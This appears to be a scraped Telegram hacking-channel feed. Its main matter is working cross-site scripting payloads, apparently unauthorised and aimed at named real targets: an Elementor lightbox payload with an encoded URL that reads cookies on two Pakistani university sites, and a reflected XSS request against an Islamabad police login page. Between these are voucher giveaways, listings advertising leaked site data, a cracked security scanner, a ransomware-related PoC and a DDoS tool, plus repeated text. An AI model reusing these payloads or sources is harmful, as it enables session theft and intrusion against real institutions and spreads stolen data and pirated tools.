1. https://umw.edu.pk/
2. https://alqadir.edu.pk/
Payload=
{
"type": "video",
"url": "http://",
"videoType": "hosted",
"videoParams": {
"onerror":"alert(document.domain+' '+document.cookie)",
"style": "background-color:green"
}
}
https://umw.edu.pk/#elementor-action:action=lightbox&settings=ewogICAgInR5cGUiOiAidmlkZW8iLAogICAgInVybCI6ICJodHRwOi8vIiwKICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwKICAgICJ2aWRlb1BhcmFtcyI6IHsKICAgICAgICAib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbisnICcrZG9jdW1lbnQuY29va2llKSIsCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtY29sb3I6cmVkIgogICAgfQp9
Dom_based Xss
2. https://alqadir.edu.pk/
Payload=
{
"type": "video",
"url": "http://",
"videoType": "hosted",
"videoParams": {
"onerror":"alert(document.domain+' '+document.cookie)",
"style": "background-color:green"
}
}
https://umw.edu.pk/#elementor-action:action=lightbox&settings=ewogICAgInR5cGUiOiAidmlkZW8iLAogICAgInVybCI6ICJodHRwOi8vIiwKICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwKICAgICJ2aWRlb1BhcmFtcyI6IHsKICAgICAgICAib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbisnICcrZG9jdW1lbnQuY29va2llKSIsCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtY29sb3I6cmVkIgogICAgfQp9
Dom_based Xss
👍1
Forwarded from Bhartiya Hunters🇮🇳 (Founder & CEO •)
Giving 1 Month TryHackMe Vouchers for only this group members & The Special Thing is :-
You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022
The Timing is fixed, Vouchers will be given at 2 PM Everyday
Enjoy Your Hacking & Give this group a special enthusiasm
Two Vouchers will be given tonight at 8PM
You Know Why We Are Giving this, Because Indians have a huge love, Humanity & Support for Everyone in this Universe, We are Celebrating India's 75th Independence (On 15th August 2022) Remembering our Freedom Fighters:- Bhagat Singh, Subash Chandra Bose, Sardar Vallabhbhai Patel, Bal Ganghadar Tilak & Many More martyrs that We Don't even Know, SALUTE TO ALL OF THEM🇮🇳
Share this Group Guys, More and More
We are doing more than enough for you But We Should get atleast Some Attention & Active Members!
@Indianshunters Crew
You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022
The Timing is fixed, Vouchers will be given at 2 PM Everyday
Enjoy Your Hacking & Give this group a special enthusiasm
Share this Group Guys, More and More
We are doing more than enough for you But We Should get atleast Some Attention & Active Members!
@Indianshunters Crew
👍3
Bhartiya Hunters🇮🇳
Giving 1 Month TryHackMe Vouchers for only this group members & The Special Thing is :- You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022 The Timing is fixed, Vouchers will be given at 2 PM Everyday Enjoy Your Hacking & Give this group…
Updates On Hackbyte Forum:-
1. [BG] HappyDreams.bg / Sleepshop.bg – Server Data
2. msn.com Leak
3. (ImHex) A Hex Editor for Reverse Engineers
4. Rapid7 Nexpose 6.6.153 Crack
5. CompTIA A+ Certification Study Guide
6. Lockbit3.0-MpClient-Defender-PoC: Lockbit3.0 Microsoft Defender MpClient.dll DLL Hijacking PoC
7. CVE-2022-31813: Forwarding addresses is hard
8. Corrupting memory without memory corruption
9. How the WordPress Gets Hacked in 2022 – Initial Reconnaissance
10. Spear Phishing on Modern Platforms
11. Scraping Login Credentials With XSS
12. Building a Self-Destructing USB Drive.
13. SSTImap – Automatic SSTI detection tool with interactive interface
14. sante.gov.dz Leak
15. ekz Group Leaked
16. Overload Layer 7 DDOS
17. Black-Dragon - An Advanced Automation Tool For Web-Recon Developed For Linux Systems.
👉🏻👉🏻All Updates On :- https://bit.ly/3yRyah3 👈🏻👈🏻
1. [BG] HappyDreams.bg / Sleepshop.bg – Server Data
2. msn.com Leak
3. (ImHex) A Hex Editor for Reverse Engineers
4. Rapid7 Nexpose 6.6.153 Crack
5. CompTIA A+ Certification Study Guide
6. Lockbit3.0-MpClient-Defender-PoC: Lockbit3.0 Microsoft Defender MpClient.dll DLL Hijacking PoC
7. CVE-2022-31813: Forwarding addresses is hard
8. Corrupting memory without memory corruption
9. How the WordPress Gets Hacked in 2022 – Initial Reconnaissance
10. Spear Phishing on Modern Platforms
11. Scraping Login Credentials With XSS
12. Building a Self-Destructing USB Drive.
13. SSTImap – Automatic SSTI detection tool with interactive interface
14. sante.gov.dz Leak
15. ekz Group Leaked
16. Overload Layer 7 DDOS
17. Black-Dragon - An Advanced Automation Tool For Web-Recon Developed For Linux Systems.
👉🏻👉🏻All Updates On :- https://bit.ly/3yRyah3 👈🏻👈🏻
👍3🔥1
Forwarded from Bhartiya Hunters🇮🇳 (Founder & CEO •)
Giving 1 Month TryHackMe Vouchers for only this group members & The Special Thing is :-
You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022
The Timing is fixed, Vouchers will be given at 2 PM Everyday
Enjoy Your Hacking & Give this group a special enthusiasm
Two Vouchers will be given tonight at 8PM
You Know Why We Are Giving this, Because Indians have a huge love, Humanity & Support for Everyone in this Universe, We are Celebrating India's 75th Independence (On 15th August 2022) Remembering our Freedom Fighters:- Bhagat Singh, Subash Chandra Bose, Sardar Vallabhbhai Patel, Bal Ganghadar Tilak & Many More martyrs that We Don't even Know, SALUTE TO ALL OF THEM🇮🇳
Share this Group Guys, More and More
We are doing more than enough for you But We Should get atleast Some Attention & Active Members!
@Indianshunters Crew
You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022
The Timing is fixed, Vouchers will be given at 2 PM Everyday
Enjoy Your Hacking & Give this group a special enthusiasm
Share this Group Guys, More and More
We are doing more than enough for you But We Should get atleast Some Attention & Active Members!
@Indianshunters Crew
👍4🎉1
Forwarded from CYBER TRICKS ZONE 🇮🇳🚩 (PROT0C0L N1CK)
How to become SOC Analyst in 2022.pdf
317.9 KB
Practical XPath Injection Exploits
When auditing a web application it can be easy to overlook certain types of vulnerabilities if not systematically checking for each individually. Injection exploits are well known, and indeed they are listed as number one in the OWASP Top 10; however, in this article we will discuss an attack that is much less popular than SQL injection, XPath and XQuery injection.
When auditing a web application it can be easy to overlook certain types of vulnerabilities if not systematically checking for each individually. Injection exploits are well known, and indeed they are listed as number one in the OWASP Top 10; however, in this article we will discuss an attack that is much less popular than SQL injection, XPath and XQuery injection.
👍1
hat is XPATH and XQuery?
XPATH is a language that queries an XML document to locate a piece of information, find elements matching a certain pattern or containing an attribute. If the client has access to a piece of the XPath query being used, and this input is not being sanitized, the client will then have access to the entire XML document if they can determine its structure. This is because XPath differs from other database languages as there is no access controls or user authentication. XQuery is a super set of the XPath language that adds SQL-like syntax as well as some useful functions for querying the document.
XPATH is a language that queries an XML document to locate a piece of information, find elements matching a certain pattern or containing an attribute. If the client has access to a piece of the XPath query being used, and this input is not being sanitized, the client will then have access to the entire XML document if they can determine its structure. This is because XPath differs from other database languages as there is no access controls or user authentication. XQuery is a super set of the XPath language that adds SQL-like syntax as well as some useful functions for querying the document.
One-click account hijack for anyone using Apple sign-in with Reddit | Bug Bounty
https://youtu.be/gLt9GqRrC4I
https://youtu.be/gLt9GqRrC4I
👍1🔥1
Forwarded from Bhartiya Hunters🇮🇳 (Founder & CEO •)
Who Needs TryHackMe Premium Voucher?
[2Months] For Free
Only Needy Person, Who really wants to learn!
We Need Some Proofs:-
1. Your any CTF/Practising Lab Statistics!
2. Your Learning experience & Current Work!
3. Your Identity, Just a Video/Voice call to Identify that Whom We are giving the voucher!
Fill Out These Form!
https://forms.gle/tsw8pts7nJFuzrgo9
At @Indianshunters !
[2Months] For Free
Only Needy Person, Who really wants to learn!
We Need Some Proofs:-
1. Your any CTF/Practising Lab Statistics!
2. Your Learning experience & Current Work!
3. Your Identity, Just a Video/Voice call to Identify that Whom We are giving the voucher!
Fill Out These Form!
https://forms.gle/tsw8pts7nJFuzrgo9
At @Indianshunters !
👍1
https://avls.islamabadpolice.gov.pk/auth/login
Reflected Xss on Username Field
identity=AmNqkDMcy4pem%22%3e%3cscript%3ealert(1)%3c%2fscript%3eybyqa&password=k1B%21n7u%21L9&captcha=HoZfBT&submit=Login
But not very useful
Reflected Xss on Username Field
identity=AmNqkDMcy4pem%22%3e%3cscript%3ealert(1)%3c%2fscript%3eybyqa&password=k1B%21n7u%21L9&captcha=HoZfBT&submit=Login
But not very useful
👍6❤1